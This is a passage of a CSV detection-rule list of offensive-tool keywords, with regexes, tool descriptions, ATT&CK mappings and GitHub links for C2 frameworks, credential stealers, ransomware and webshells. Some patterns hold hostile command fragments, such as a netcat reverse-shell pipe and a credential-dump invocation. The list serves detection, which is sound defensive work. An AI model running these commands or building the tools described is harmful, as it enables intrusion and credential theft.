first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*_NT6_CLEAR_SECRET*",".{0,1000}_NT6_CLEAR_SECRET.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_peloader.dll*",".{0,1000}_peloader\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*_posh-common*",".{0,1000}_posh\-common.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*_prefix_PEzor_*",".{0,1000}_prefix_PEzor_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*_pycobalt_*",".{0,1000}_pycobalt_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*_REFLECTIVEDLLINJECTION_*",".{0,1000}_REFLECTIVEDLLINJECTION_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*_Shellcode.bin*",".{0,1000}_Shellcode\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*_smtp_user-enum_hydra_*",".{0,1000}_smtp_user\-enum_hydra_.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk.txt*",".{0,1000}_snmp_snmpwalk\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_process_paths.txt*",".{0,1000}_snmp_snmpwalk_process_paths\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_running_processes.txt*",".{0,1000}_snmp_snmpwalk_running_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_software_names.txt*",".{0,1000}_snmp_snmpwalk_software_names\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_storage_units.txt*",".{0,1000}_snmp_snmpwalk_storage_units\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_system_processes.txt*",".{0,1000}_snmp_snmpwalk_system_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_tcp_ports.txt*",".{0,1000}_snmp_snmpwalk_tcp_ports\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_user_accounts.txt*",".{0,1000}_snmp_snmpwalk_user_accounts\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_tcp_cc2(*",".{0,1000}_tcp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*_udp_cc2(*",".{0,1000}_udp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*{os.getlogin()} | Fentanyl*",".{0,1000}\{os\.getlogin\(\)\}\s\|\sFentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*{process_to_inject}.exe*",".{0,1000}\{process_to_inject\}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*| favfreak*",".{0,1000}\|\sfavfreak.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*| hakrawler*",".{0,1000}\|\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*|/bin/sh -i 2>&1|nc * >/tmp/f*",".{0,1000}\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*|base64 -d > /tmp/traitor*",".{0,1000}\|base64\s\-d\s\>\s\/tmp\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*|IEX}DumpSAM*",".{0,1000}\|IEX\}DumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*~/.csexec*",".{0,1000}\~\/\.csexec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*< /dev/console | uudecode && uncompress*",".{0,1000}\<\s\/dev\/console\s\|\suudecode\s\&\&\suncompress.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*<3 eo.oe*",".{0,1000}\<3\seo\.oe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "**",".{0,1000}\.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*

.:NCC:. Shell v*",".{0,1000}\\.\:NCC\:\.\sShell\sv.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*

-=[+] IDBTEAM SHELLS*",".{0,1000}\\\-\=\[\+\]\sIDBTEAM\sSHELLS.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*

Wraith Login*",".{0,1000}\Wraith\sLogin.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*

Laudanum Tools*",".{0,1000}\Laudanum\sTools.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*

Why pay us?

*",".{0,1000}\Why\spay\sus\?\<\/h2\>.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*Wardom | Ne Mutlu T*",".{0,1000}\<head\>\<title\>Wardom\s\|\sNe\sMutlu\sT.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<SessionId>: list/steal token from specific session*",".{0,1000}\<SessionId\>\:\slist\/steal\stoken\sfrom\sspecific\ssession.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*<title>Dynasty Persist*",".{0,1000}\Dynasty\sPersist\<\/title\>.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*PrivescCheck Report*",".{0,1000}\PrivescCheck\sReport\<\/title\>.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Sosyete Safe Mode Bypass Shell -*",".{0,1000}\<title\>Sosyete\sSafe\sMode\sBypass\sShell\s\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<title>SyRiAn Sh3ll ~*",".{0,1000}\<title\>SyRiAn\sSh3ll\s\~.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<title>WebRoot Hack Tools""*",".{0,1000}\<title\>WebRoot\sHack\sTools\"".{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<title>Wraith Login*",".{0,1000}\Wraith\sLogin\<\/title\>.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*= ""evil-proxy""*",".{0,1000}\=\s\""evil\-proxy\"".{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*=[ 1n73ct10n privat shell ]=*",".{0,1000}\=\[\s1n73ct10n\sprivat\sshell\s\]\=.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*--==[[ Andela Yuwono Priv8 Shell ]]==--*",".{0,1000}\-\-\=\=\[\[\sAndela\sYuwono\sPriv8\sShell\s\]\]\=\=\-\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*",".{0,1000}\=\=\=\sGENERATING\sMALICIOUS\sGROUP\sPOLICY\sTEMPLATE\s\=\=\=.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*=== LAUNCHING SMB SERVER AND WAITING FOR GPT REQUESTS 